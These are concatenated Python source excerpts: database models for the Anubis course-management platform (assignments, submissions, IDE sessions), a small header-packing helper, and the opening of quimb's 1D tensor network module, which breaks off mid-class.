accept_late = db.Column(db.Boolean, default=True)
hide_due_date = db.Column(db.Boolean, default=False)
questions_assigned = db.Column(db.Boolean, default=False)
# Autograde
pipeline_image = db.Column(db.TEXT, nullable=True, index=True)
autograde_enabled = db.Column(db.Boolean, default=True)
# IDE
ide_enabled = db.Column(db.Boolean, default=True)
theia_image = db.Column(
db.TEXT, default="registry.digitalocean.com/anubis/theia-xv6"
)
theia_options = db.Column(
MutableJson, default=lambda: copy.deepcopy(THEIA_DEFAULT_OPTIONS)
)
# Github
github_template = db.Column(db.TEXT, nullable=True, default="")
github_repo_required = db.Column(db.Boolean, default=False)
# Dates
release_date = db.Column(db.DateTime, nullable=False)
due_date = db.Column(db.DateTime, nullable=False)
grace_date = db.Column(db.DateTime, nullable=True)
assignment_questions = db.relationship(
"AssignmentQuestion", cascade="all,delete", backref="assignment"
)
assigned_student_questions = db.relationship(
"AssignedStudentQuestion", cascade="all,delete", backref="assignment"
)
submissions = db.relationship(
"Submission", cascade="all,delete", backref="assignment"
)
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="assignment"
)
late_exceptions = db.relationship(
"LateException", cascade="all,delete", backref="assignment"
)
tests = db.relationship(
"AssignmentTest", cascade="all,delete", backref="assignment"
)
repos = db.relationship(
"AssignmentRepo", cascade="all,delete", backref="assignment"
)
@property
def data(self):
return {
"id": self.id,
"name": self.name,
"due_date": str(self.due_date),
"past_due": self.due_date < datetime.now(),
"hidden": self.hidden,
"accept_late": self.accept_late,
"autograde_enabled": self.autograde_enabled,
"hide_due_date": self.hide_due_date,
"course": self.course.data,
"description": self.description,
"visible_to_students": not self.hidden
and (datetime.now() > self.release_date),
"ide_active": self.due_date + timedelta(days=3 * 7) > datetime.now(),
"tests": [t.data for t in self.tests if t.hidden is False],
# IDE
"ide_enabled": self.ide_enabled,
"autosave": self.theia_options.get("autosave", True),
"persistent_storage": self.theia_options.get("persistent_storage", False),
# Github
"github_repo_required": self.github_repo_required,
}
@property
def full_data(self):
data = self.data
data["tests"] = [t.data for t in self.tests]
return data
class AssignmentRepo(db.Model):
__tablename__ = "assignment_repo"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), nullable=True)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), nullable=False
)
# Fields
github_username = db.Column(db.TEXT, nullable=False)
repo_url = db.Column(db.String(512), nullable=False)
# State booleans
repo_created = db.Column(db.Boolean, default=False)
collaborator_configured = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"id": self.id,
"github_username": self.github_username,
"assignment_id": self.assignment_id,
"assignment_name": self.assignment.name,
"ready": self.repo_created and self.collaborator_configured,
"course_code": self.assignment.course.course_code,
"repo_url": self.repo_url,
}
class AssignmentTest(db.Model):
__tablename__ = "assignment_test"
# id
id = default_id()
# Foreign Keys
assignment_id = db.Column(db.String(128), db.ForeignKey(Assignment.id))
# Fields
name = db.Column(db.TEXT, index=True)
hidden = db.Column(db.Boolean, default=False)
@property
def data(self):
return {"id": self.id, "name": self.name, "hidden": self.hidden}
class AssignmentQuestion(db.Model):
__tablename__ = "assignment_question"
# id
id = default_id()
# Foreign Keys
assignment_id = db.Column(db.String(128), db.ForeignKey(Assignment.id), index=True)
# Fields
question = db.Column(db.Text, nullable=False)
solution = db.Column(db.Text, nullable=True)
pool = db.Column(db.Integer, index=True, nullable=False)
code_question = db.Column(db.Boolean, default=False)
code_language = db.Column(db.TEXT, nullable=True, default="")
placeholder = db.Column(db.Text, nullable=True, default="")
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
shape = {"question": str, "solution": str, "pool": int}
@property
def full_data(self):
return {
"id": self.id,
"question": self.question,
"code_question": self.code_question,
"code_language": self.code_language,
"solution": self.solution,
"pool": self.pool,
}
@property
def data(self):
return {
"id": self.id,
"question": self.question,
"code_question": self.code_question,
"code_language": self.code_language,
"pool": self.pool,
}
class AssignedStudentQuestion(db.Model):
__tablename__ = "assigned_student_question"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id))
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), index=True, nullable=False
)
question_id = db.Column(
db.String(128), db.ForeignKey(AssignmentQuestion.id), index=True, nullable=False
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Relationships
question = db.relationship(AssignmentQuestion)
responses = db.relationship(
"AssignedQuestionResponse", cascade="all,delete", backref="question"
)
@property
def data(self):
"""
Returns simple dictionary representation of the object.
:return:
"""
response: AssignedQuestionResponse = (
AssignedQuestionResponse.query.filter(
AssignedQuestionResponse.assigned_question_id == self.id,
)
.order_by(AssignedQuestionResponse.created.desc())
.first()
)
response_data = {
"submitted": None,
"late": True,
"text": self.question.placeholder,
}
if response is not None:
response_data = response.data
return {
"id": self.id,
"response": response_data,
"question": self.question.data,
}
@property
def full_data(self):
data = self.data
data["question"] = self.question.full_data
return data
class AssignedQuestionResponse(db.Model):
__tablename__ = "assigned_student_response"
# id
id = default_id()
# Foreign Keys
assigned_question_id = db.Column(
db.String(128),
db.ForeignKey(AssignedStudentQuestion.id),
index=True,
nullable=False,
)
# Fields
response = db.Column(db.TEXT, default="", nullable=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
from anubis.lms.assignments import get_assignment_due_date
return {
"submitted": str(self.created),
"late": get_assignment_due_date(
self.question.owner.id, self.question.assignment.id
)
< self.created,
"text": self.response,
}
class Submission(db.Model):
__tablename__ = "submission"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(
db.String(128), db.ForeignKey(User.id), index=True, nullable=True
)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), index=True, nullable=False
)
assignment_repo_id = db.Column(
db.String(128), db.ForeignKey(AssignmentRepo.id), nullable=False
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Fields
commit = db.Column(db.String(128), unique=True, index=True, nullable=False)
processed = db.Column(db.Boolean, default=False)
state = db.Column(db.TEXT, default="")
errors = db.Column(MutableJson, default=None, nullable=True)
token = db.Column(
db.String(64), default=lambda: base64.b16encode(os.urandom(32)).decode()
)
accepted = db.Column(db.Boolean, default=True)
# Relationships
build = db.relationship(
"SubmissionBuild",
cascade="all,delete",
uselist=False,
backref="submission",
lazy=False,
)
test_results = db.relationship(
"SubmissionTestResult", cascade="all,delete", backref="submission", lazy=False
)
repo = db.relationship(AssignmentRepo, backref="submissions")
@property
def visible_tests(self):
"""
Get a list of dictionaries of the matching Test, and TestResult
for the current submission.
:return:
"""
# Query for matching AssignmentTests, and TestResults
tests = (
SubmissionTestResult.query.join(AssignmentTest)
.filter(
SubmissionTestResult.submission_id == self.id,
AssignmentTest.hidden == False,
)
.all()
)
# Convert to dictionary data
return [
{"test": result.assignment_test.data, "result": result.data}
for result in tests
]
@property
def all_tests(self):
"""
Get a list of dictionaries of the matching Test, and TestResult
for the current submission.
:return:
"""
# Query for matching AssignmentTests, and TestResults
tests = (
SubmissionTestResult.query.join(AssignmentTest)
.filter(
SubmissionTestResult.submission_id == self.id,
)
.all()
)
# Convert to dictionary data
return [
{"test": result.assignment_test.data, "result": result.data}
for result in tests
]
@property
def data(self):
return {
"id": self.id,
"assignment_name": self.assignment.name,
"assignment_due": str(self.assignment.due_date),
"course_code": self.assignment.course.course_code,
"commit": self.commit,
"processed": self.processed,
"state": self.state,
"created": str(self.created),
"last_updated": str(self.last_updated),
"error": self.errors is not None,
}
@property
def full_data(self):
data = self.data
# Add connected models
data["repo"] = self.repo.repo_url
data["tests"] = self.visible_tests
data["build"] = self.build.data if self.build is not None else None
return data
@property
def admin_data(self):
data = self.data
# Add connected models
data["repo"] = self.repo.repo_url
data["tests"] = self.all_tests
data["build"] = self.build.data if self.build is not None else None
return data
class SubmissionTestResult(db.Model):
__tablename__ = "submission_test_result"
# id
id = default_id()
# Foreign Keys
submission_id = db.Column(
db.String(128), db.ForeignKey(Submission.id), primary_key=True
)
assignment_test_id = db.Column(
db.String(128), db.ForeignKey(AssignmentTest.id), primary_key=True
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Fields
stdout = deferred(db.Column(db.Text))
message = deferred(db.Column(db.Text))
passed = db.Column(db.Boolean)
# Relationships
assignment_test = db.relationship(AssignmentTest)
@property
def data(self):
return {
"id": self.id,
"test_name": self.assignment_test.name,
"passed": self.passed,
"message": self.message,
"stdout": self.stdout,
"created": str(self.created),
"last_updated": str(self.last_updated),
}
@property
def stat_data(self):
data = self.data
del data["stdout"]
return data
def __str__(self):
return "testname: {}\nerrors: {}\npassed: {}\n".format(
self.testname,
self.errors,
self.passed,
)
class SubmissionBuild(db.Model):
__tablename__ = "submission_build"
# id
id = default_id()
# Foreign Keys
submission_id = db.Column(db.String(128), db.ForeignKey(Submission.id), index=True)
# Fields
stdout = deferred(db.Column(db.Text))
passed = db.Column(db.Boolean, default=None)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"stdout": self.stdout,
"passed": self.passed,
}
@property
def stat_data(self):
data = self.data
del data["stdout"]
return data
class TheiaSession(db.Model):
__tablename__ = "theia_session"
# id
id = default_id(32)
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Foreign keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), nullable=False)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), nullable=True
)
repo_url = db.Column(db.String(128), nullable=True)
# Fields
active = db.Column(db.Boolean, default=True)
state = db.Column(db.TEXT)
cluster_address = db.Column(db.TEXT, nullable=True, default=None)
image = db.Column(db.TEXT, default="registry.digitalocean.com/anubis/theia-xv6")
resources = db.Column(MutableJson, default=lambda: {})
network_policy = db.Column(db.String(128), default="os-student")
network_locked = db.Column(db.Boolean, default=True)
privileged = db.Column(db.Boolean, default=False)
autosave = db.Column(db.Boolean, default=True)
credentials = db.Column(db.Boolean, default=False)
persistent_storage = db.Column(db.Boolean, default=False)
k8s_requested = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
ended = db.Column(db.DateTime, nullable=True, default=None)
last_proxy = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
from anubis.lms.theia import theia_redirect_url
return {
"id": self.id,
"assignment_id": self.assignment_id,
"assignment_name": self.assignment.name
if self.assignment_id is not None
else None,
"course_code": self.assignment.course.course_code
if self.assignment_id is not None
else None,
"netid": self.owner.netid,
"repo_url": self.repo_url,
"redirect_url": theia_redirect_url(self.id, self.owner.netid),
"active": self.active,
"state": self.state,
"created": str(self.created),
"ended": str(self.ended),
"last_proxy": str(self.last_proxy),
"last_updated": str(self.last_updated),
"autosave": self.autosave,
"persistent_storage": self.persistent_storage,
}
@property
def settings(self):
return {
"image": self.image,
"repo_url": self.repo_url,
"autosave": self.autosave,
"privileged": self.privileged,
"credentials": self.credentials,
"network_locked": self.network_locked,
"persistent_storage": self.persistent_storage,
}
class StaticFile(db.Model):
__tablename__ = "static_file"
id = default_id()
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Fields
filename = db.Column(db.TEXT)
path = db.Column(db.TEXT)
content_type = db.Column(db.TEXT)
blob = deferred(db.Column(db.LargeBinary(length=(2 ** 32) - 1)))
hidden = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
lecture_notes = db.relationship(
"LectureNotes", cascade="all,delete", backref="static_file"
)
@property
def data(self):
return {
"id": self.id,
"content_type": self.content_type,
"filename": self.filename,
"path": self.path,
"hidden": self.hidden,
"uploaded": str(self.created),
}
class LateException(db.Model):
__tablename__ = "late_exception"
user_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), primary_key=True
)
# New Due Date
due_date = db.Column(db.DateTime, nullable=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"user_id": self.user_id,
"user_name": self.user.name,
"user_netid": self.user.netid,
"assignment_id": self.assignment_id,
"due_date": str(self.due_date),
}
class LectureNotes(db.Model):
__tablename__ = "lecture_notes"
id = default_id()
# Foreign keys
static_file_id = db.Column(
db.String(128), db.ForeignKey(StaticFile.id), nullable=False, index=True
)
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Meta fields
post_time = db.Column(db.DateTime, nullable=True, default=datetime.now)
title = db.Column(db.TEXT, default="")
description = db.Column(db.TEXT, default="")
hidden = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"id": self.id,
"static_file": self.static_file.data,
"course": self.course.course_code,
"title": self.title,
"description": self.description,
"hidden": self.hidden,
"post_time": str(self.post_time),
"created": str(self.created),
"last_updated": str(self.last_updated),
}
|
py | 1a331bc6938717077623feaa9eadbccb373f5509 | def get_header(header_class, *args, **kwargs):
"""Construct and packs a given header"""
hdr = header_class()
hdr.setVals(*args, **kwargs)
return hdr.pack()
|
py | 1a331c43aee600b5098a000a8150a55795aa6e8b | """Classes and algorithms related to 1D tensor networks.
"""
import re
import operator
import functools
from math import log2
from numbers import Integral
import scipy.sparse.linalg as spla
from autoray import do, dag, reshape, conj, get_dtype_name, transpose
from ..utils import (
check_opt, print_multi_line, ensure_dict, partition_all, deprecated
)
import quimb as qu
from .tensor_core import (
Tensor,
TensorNetwork,
rand_uuid,
bonds,
bonds_size,
oset,
tags_to_oset,
get_tags,
PTensor,
)
from .tensor_arbgeom import tensor_network_align, tensor_network_apply_op_vec
from ..linalg.base_linalg import norm_trace_dense
from . import array_ops as ops
align_TN_1D = deprecated(
tensor_network_align, 'align_TN_1D', 'tensor_network_align')
def expec_TN_1D(*tns, compress=None, eps=1e-15):
"""Compute the expectation of several 1D TNs, using transfer matrix
compression if any are periodic.
Parameters
----------
tns : sequence of TensorNetwork1D
The MPS and MPO to find expectation of. Should start and begin with
an MPS e.g. ``(MPS, MPO, ..., MPS)``.
compress : {None, False, True}, optional
Whether to perform transfer matrix compression on cyclic systems. If
set to ``None`` (the default), decide heuristically.
eps : float, optional
The accuracy of the transfer matrix compression.
Returns
-------
x : float
The expectation value.
"""
expec_tn = functools.reduce(operator.or_, tensor_network_align(*tns))
# if OBC or <= 0.0 specified use exact contraction
cyclic = any(tn.cyclic for tn in tns)
if not cyclic:
compress = False
n = expec_tn.L
isflat = all(isinstance(tn, TensorNetwork1DFlat) for tn in tns)
# work out whether to compress, could definitely be improved ...
if compress is None and isflat:
# compression only worth it for long, high bond dimension TNs.
total_bd = qu.prod(tn.bond_size(0, 1) for tn in tns)
compress = (n >= 100) and (total_bd >= 1000)
if compress:
expec_tn.replace_section_with_svd(1, n, eps=eps, inplace=True)
return expec_tn ^ all
return expec_tn ^ ...
_VALID_GATE_CONTRACT = {False, True, 'swap+split',
'split-gate', 'swap-split-gate', 'auto-split-gate'}
_VALID_GATE_PROPAGATE = {'sites', 'register', False, True}
_TWO_BODY_ONLY = _VALID_GATE_CONTRACT - {True, False}
def maybe_factor_gate_into_tensor(G, dp, ng, where):
# allow gate to be a matrix as long as it factorizes into tensor
shape_matches_2d = (ops.ndim(G) == 2) and (G.shape[1] == dp ** ng)
shape_matches_nd = all(d == dp for d in G.shape)
if shape_matches_2d:
G = ops.asarray(G)
if ng >= 2:
G = reshape(G, [dp] * 2 * ng)
elif not shape_matches_nd:
raise ValueError(
f"Gate with shape {G.shape} doesn't match sites {where}.")
return G
def gate_TN_1D(tn, G, where, contract=False, tags=None,
propagate_tags='sites', inplace=False,
cur_orthog=None, **compress_opts):
r"""Act with the gate ``g`` on sites ``where``, maintaining the outer
indices of the 1D tensor netowork::
contract=False contract=True
. . . . <- where
o-o-o-o-o-o-o o-o-o-GGG-o-o-o
| | | | | | | | | | / \ | | |
GGG
| |
contract='split-gate' contract='swap-split-gate'
. . . . <- where
o-o-o-o-o-o-o o-o-o-o-o-o-o
| | | | | | | | | | | | | |
G~G G~G
| | \ /
X
/ \
contract='swap+split'
. . <- where
o-o-o-G=G-o-o-o
| | | | | | | |
Note that the sites in ``where`` do not have to be contiguous. By default,
site tags will be propagated to the gate tensors, identifying a
'light cone'.
Parameters
----------
tn : TensorNetwork1DVector
The 1D vector-like tensor network, for example, and MPS.
G : array
A square array to act with on sites ``where``. It should have twice the
number of dimensions as the number of sites. The second half of these
will be contracted with the MPS, and the first half indexed with the
correct ``site_ind_id``. Sites are read left to right from the shape.
A two-dimensional array is permissible if each dimension factorizes
correctly.
where : int or sequence of int
Where the gate should act.
contract : {False, 'split-gate', 'swap-split-gate',
'auto-split-gate', True, 'swap+split'}, optional
Whether to contract the gate into the 1D tensor network. If,
- False: leave the gate uncontracted, the default
- 'split-gate': like False, but split the gate if it is two-site.
- 'swap-split-gate': like 'split-gate', but decompose the gate as
if a swap had first been applied
- 'auto-split-gate': automatically select between the above three
options, based on the rank of the gate.
- True: contract the gate into the tensor network, if the gate acts
on more than one site, this will produce an ever larger tensor.
- 'swap+split': Swap sites until they are adjacent, then contract
the gate and split the resulting tensor, then swap the sites back
to their original position. In this way an MPS structure can be
explicitly maintained at the cost of rising bond-dimension.
tags : str or sequence of str, optional
Tag the new gate tensor with these tags.
propagate_tags : {'sites', 'register', False, True}, optional
Add any tags from the sites to the new gate tensor (only matters if
``contract=False`` else tags are merged anyway):
- If ``'sites'``, then only propagate tags matching e.g. 'I{}' and
ignore all others. I.e. just propagate the lightcone.
- If ``'register'``, then only propagate tags matching the sites of
where this gate was actually applied. I.e. ignore the lightcone,
just keep track of which 'registers' the gate was applied to.
- If ``False``, propagate nothing.
- If ``True``, propagate all tags.
inplace, bool, optional
Perform the gate in place.
compress_opts
Supplied to :meth:`~quimb.tensor.tensor_core.Tensor.split`
if ``contract='swap+split'`` or
:meth:`~quimb.tensor.tensor_1d.MatrixProductState.gate_with_auto_swap`
if ``contract='swap+split'``.
Returns
-------
TensorNetwork1DVector
See Also
--------
MatrixProductState.gate_split
Examples
--------
>>> p = MPS_rand_state(3, 7)
>>> p.gate_(spin_operator('X'), where=1, tags=['GX'])
>>> p
<MatrixProductState(tensors=4, L=3, max_bond=7)>
>>> p.outer_inds()
('k0', 'k1', 'k2')
"""
check_opt('contract', contract, _VALID_GATE_CONTRACT)
check_opt('propagate_tags', propagate_tags, _VALID_GATE_PROPAGATE)
psi = tn if inplace else tn.copy()
if isinstance(where, Integral):
where = (where,)
ng = len(where) # number of sites the gate acts on
dp = psi.phys_dim(where[0])
tags = tags_to_oset(tags)
if (ng > 2) and contract in _TWO_BODY_ONLY:
raise ValueError(f"Can't use `contract='{contract}'` for >2 sites.")
G = maybe_factor_gate_into_tensor(G, dp, ng, where)
if contract == 'swap+split' and ng > 1:
psi.gate_with_auto_swap(G, where, cur_orthog=cur_orthog,
inplace=True, **compress_opts)
return psi
bnds = [rand_uuid() for _ in range(ng)]
site_ix = [psi.site_ind(i) for i in where]
gate_ix = site_ix + bnds
psi.reindex_(dict(zip(site_ix, bnds)))
# get the sites that used to have the physical indices
site_tids = psi._get_tids_from_inds(bnds, which='any')
# convert the gate into a tensor - check if it is parametrized
if isinstance(G, ops.PArray):
if (ng >= 2) and (contract is not False):
raise ValueError(
"For a parametrized gate acting on more than one site "
"``contract`` must be false to preserve the array shape.")
TG = PTensor.from_parray(G, gate_ix, tags=tags, left_inds=bnds)
else:
TG = Tensor(G, gate_ix, tags=tags, left_inds=bnds)
# handle 'swap+split' only for ``ng == 1``
if contract in (True, 'swap+split'):
# pop the sites, contract, then re-add
pts = [psi._pop_tensor(tid) for tid in site_tids]
psi |= TG.contract(*pts)
return psi
# if not contracting the gate into the network, work out which tags to
# 'propagate' forward from the tensors being acted on to the gate tensors
if propagate_tags:
if propagate_tags == 'register':
old_tags = oset(map(psi.site_tag, where))
else:
old_tags = get_tags(psi.tensor_map[tid] for tid in site_tids)
if propagate_tags == 'sites':
# use regex to take tags only matching e.g. 'I0', 'I13'
rex = re.compile(psi.site_tag_id.format(r"\d+"))
old_tags = oset(filter(rex.match, old_tags))
TG.modify(tags=TG.tags | old_tags)
if ng == 1:
psi |= TG
return psi
# check if we should split multi-site gates (which may result in an easier
# tensor network to contract if we use compression)
if contract in ('split-gate', 'auto-split-gate'):
# | | | |
# GGG --> G~G
# | | | |
ts_gate_norm = TG.split(TG.inds[::2], get='tensors', **compress_opts)
# sometimes it is worth performing the decomposition *across* the gate,
# effectively introducing a SWAP
if contract in ('swap-split-gate', 'auto-split-gate'):
# \ /
# | | X
# GGG --> / \
# | | G~G
# | |
ts_gate_swap = TG.split(TG.inds[::3], get='tensors', **compress_opts)
# like 'split-gate' but check the rank for swapped indices also, and if no
# rank reduction, simply don't swap
if contract == 'auto-split-gate':
# | | \ /
# | | | | X | |
# GGG --> G~G or / \ or ... GGG
# | | | | G~G | |
# | | | |
norm_rank = bonds_size(*ts_gate_norm)
swap_rank = bonds_size(*ts_gate_swap)
if swap_rank < norm_rank:
contract = 'swap-split-gate'
elif norm_rank < dp**ng:
contract = 'split-gate'
else:
# else no rank reduction available - leave as ``contract=False``.
contract = False
if contract == 'swap-split-gate':
ts_gate = ts_gate_swap
elif contract == 'split-gate':
ts_gate = ts_gate_norm
else:
ts_gate = (TG,)
# if we are splitting the gate then only add site tags on the tensors
# directly 'above' the site
if contract in ('split-gate', 'swap-split-gate'):
if propagate_tags == 'register':
ts_gate[0].drop_tags(psi.site_tag(where[1]))
ts_gate[1].drop_tags(psi.site_tag(where[0]))
for t in ts_gate:
psi |= t
return psi
def superop_TN_1D(tn_super, tn_op,
upper_ind_id='k{}',
lower_ind_id='b{}',
so_outer_upper_ind_id=None,
so_inner_upper_ind_id=None,
so_inner_lower_ind_id=None,
so_outer_lower_ind_id=None):
r"""Take a tensor network superoperator and act with it on a
tensor network operator, maintaining the original upper and lower
indices of the operator::
outer_upper_ind_id upper_ind_id
| | | ... | | | | ... |
+----------+ +----------+
| tn_super +---+ | tn_super +---+
+----------+ | upper_ind_id +----------+ |
| | | ... | | | | | ... | | | | ... | |
inner_upper_ind_id| +-----------+ +-----------+ |
| + | tn_op | = | tn_op | |
inner_lower_ind_id| +-----------+ +-----------+ |
| | | ... | | | | | ... | | | | ... | |
+----------+ | lower_ind_id +----------+ |
| tn_super +---+ | tn_super +---+
+----------+ +----------+
| | | ... | <-- | | | ... |
outer_lower_ind_id lower_ind_id
Parameters
----------
tn_super : TensorNetwork
The superoperator in the form of a 1D-like tensor network.
tn_op : TensorNetwork
The operator to be acted on in the form of a 1D-like tensor network.
upper_ind_id : str, optional
Current id of the upper operator indices, e.g. usually ``'k{}'``.
lower_ind_id : str, optional
Current id of the lower operator indices, e.g. usually ``'b{}'``.
so_outer_upper_ind_id : str, optional
Current id of the superoperator's upper outer indices, these will be
reindexed to form the new effective operators upper indices.
so_inner_upper_ind_id : str, optional
Current id of the superoperator's upper inner indices, these will be
joined with those described by ``upper_ind_id``.
so_inner_lower_ind_id : str, optional
Current id of the superoperator's lower inner indices, these will be
joined with those described by ``lower_ind_id``.
so_outer_lower_ind_id : str, optional
Current id of the superoperator's lower outer indices, these will be
reindexed to form the new effective operators lower indices.
Returns
-------
KAK : TensorNetwork
The tensornetwork of the superoperator acting on the operator.
"""
n = tn_op.L
if so_outer_upper_ind_id is None:
so_outer_upper_ind_id = getattr(tn_super, 'outer_upper_ind_id', 'kn{}')
if so_inner_upper_ind_id is None:
so_inner_upper_ind_id = getattr(tn_super, 'inner_upper_ind_id', 'k{}')
if so_inner_lower_ind_id is None:
so_inner_lower_ind_id = getattr(tn_super, 'inner_lower_ind_id', 'b{}')
if so_outer_lower_ind_id is None:
so_outer_lower_ind_id = getattr(tn_super, 'outer_lower_ind_id', 'bn{}')
reindex_map = {}
for i in range(n):
upper_bnd = rand_uuid()
lower_bnd = rand_uuid()
reindex_map[upper_ind_id.format(i)] = upper_bnd
reindex_map[lower_ind_id.format(i)] = lower_bnd
reindex_map[so_inner_upper_ind_id.format(i)] = upper_bnd
reindex_map[so_inner_lower_ind_id.format(i)] = lower_bnd
reindex_map[so_outer_upper_ind_id.format(i)] = upper_ind_id.format(i)
reindex_map[so_outer_lower_ind_id.format(i)] = lower_ind_id.format(i)
return tn_super.reindex(reindex_map) & tn_op.reindex(reindex_map)
class TensorNetwork1D(TensorNetwork):
"""Base class for tensor networks with a one-dimensional structure.
"""
_NDIMS = 1
_EXTRA_PROPS = ('_site_tag_id', '_L')
_CONTRACT_STRUCTURED = True
def _compatible_1d(self, other):
"""Check whether ``self`` and ``other`` are compatible 2D tensor
networks such that they can remain a 2D tensor network when combined.
"""
return (
isinstance(other, TensorNetwork1D) and
all(getattr(self, e) == getattr(other, e)
for e in TensorNetwork1D._EXTRA_PROPS)
)
def __and__(self, other):
new = super().__and__(other)
if self._compatible_1d(other):
new.view_as_(TensorNetwork1D, like=self)
return new
def __or__(self, other):
new = super().__or__(other)
if self._compatible_1d(other):
new.view_as_(TensorNetwork1D, like=self)
return new
@property
def L(self):
"""The number of sites.
"""
return self._L
@property
def nsites(self):
"""The number of sites.
"""
return self._L
def gen_site_coos(self):
return tuple(i for i in range(self.L) if
self.site_tag(i) in self.tag_map)
@property
def site_tag_id(self):
"""The string specifier for tagging each site of this 1D TN.
"""
return self._site_tag_id
def site_tag(self, i):
"""The name of the tag specifiying the tensor at site ``i``.
"""
if not isinstance(i, str):
i = i % self.L
return self.site_tag_id.format(i)
def slice2sites(self, tag_slice):
"""Take a slice object, and work out its implied start, stop and step,
taking into account cyclic boundary conditions.
Examples
--------
Normal slicing:
>>> p = MPS_rand_state(10, bond_dim=7)
>>> p.slice2sites(slice(5))
(0, 1, 2, 3, 4)
>>> p.slice2sites(slice(4, 8))
(4, 5, 6, 7)
Slicing from end backwards:
>>> p.slice2sites(slice(..., -3, -1))
(9, 8)
Slicing round the end:
>>> p.slice2sites(slice(7, 12))
(7, 8, 9, 0, 1)
>>> p.slice2sites(slice(-3, 2))
(7, 8, 9, 0, 1)
If the start point is > end point (*before* modulo n), then step needs
to be negative to return anything.
"""
if tag_slice.start is None:
start = 0
elif tag_slice.start is ...:
if tag_slice.step == -1:
start = self.L - 1
else:
start = -1
else:
start = tag_slice.start
if tag_slice.stop in (..., None):
stop = self.L
else:
stop = tag_slice.stop
step = 1 if tag_slice.step is None else tag_slice.step
return tuple(s % self.L for s in range(start, stop, step))
def maybe_convert_coo(self, x):
"""Check if ``x`` is an integer and convert to the
corresponding site tag if so.
"""
if isinstance(x, Integral):
return (self.site_tag(x),)
if isinstance(x, slice):
return tuple(map(self.site_tag, self.slice2sites(x)))
return x
def _get_tids_from_tags(self, tags, which='all'):
"""This is the function that lets single integers be used for many
'tag' based functions.
"""
tags = self.maybe_convert_coo(tags)
return super()._get_tids_from_tags(tags, which=which)
def retag_sites(self, new_id, where=None, inplace=False):
"""Modify the site tags for all or some tensors in this 1D TN
(without changing the ``site_tag_id``).
"""
if where is None:
where = self.gen_site_coos()
return self.retag({self.site_tag(i): new_id.format(i) for i in where},
inplace=inplace)
@site_tag_id.setter
def site_tag_id(self, new_id):
if self._site_tag_id != new_id:
self.retag_sites(new_id, inplace=True)
self._site_tag_id = new_id
@property
def site_tags(self):
"""An ordered tuple of the actual site tags.
"""
return tuple(map(self.site_tag, self.gen_site_coos()))
@property
def sites(self):
return tuple(self.gen_site_coos())
@functools.wraps(tensor_network_align)
def align(self, *args, inplace=False, **kwargs):
return tensor_network_align(self, *args, inplace=inplace, **kwargs)
align_ = functools.partialmethod(align, inplace=True)
def contract_structured(
self,
tag_slice,
structure_bsz=5,
inplace=False,
**opts
):
"""Perform a structured contraction, translating ``tag_slice`` from a
``slice`` or `...` to a cumulative sequence of tags.
Parameters
----------
tag_slice : slice or ...
The range of sites, or `...` for all.
inplace : bool, optional
Whether to perform the contraction inplace.
Returns
-------
TensorNetwork, Tensor or scalar
The result of the contraction, still a ``TensorNetwork`` if the
contraction was only partial.
See Also
--------
contract, contract_tags, contract_cumulative
"""
# check for all sites
if tag_slice is ...:
# else slice over all sites
tag_slice = slice(0, self.L)
# filter sites by the slice, but also which sites are present at all
tags_seq = filter(self.tag_map.__contains__,
map(self.site_tag, self.slice2sites(tag_slice)))
# partition sites into `structure_bsz` groups
if structure_bsz > 1:
tags_seq = partition_all(structure_bsz, tags_seq)
# contract each block of sites cumulatively
return self.contract_cumulative(tags_seq, inplace=inplace, **opts)
def __repr__(self):
"""Insert length and max bond into standard print.
"""
s = super().__repr__()
extra = f', L={self.L}, max_bond={self.max_bond()}'
s = f'{s[:-2]}{extra}{s[-2:]}'
return s
def __str__(self):
"""Insert length and max bond into standard print.
"""
s = super().__str__()
extra = f', L={self.L}, max_bond={self.max_bond()}'
s = f'{s[:-1]}{extra}{s[-1:]}'
return s
class TensorNetwork1DVector(TensorNetwork1D,
